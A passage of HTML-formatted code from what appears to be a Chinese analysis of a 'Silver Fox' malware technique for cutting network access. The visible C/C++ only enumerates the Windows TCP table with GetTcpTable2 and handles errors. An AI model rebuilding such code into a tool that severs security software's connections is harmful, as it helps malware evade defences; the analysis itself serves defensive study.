style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ERROR_INSUFFICIENT_BUFFER</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Failed to query TCP table size.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">PMIB_TCPTABLE2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">malloc</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Memory allocation failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NO_ERROR</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Failed to get TCP table.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim 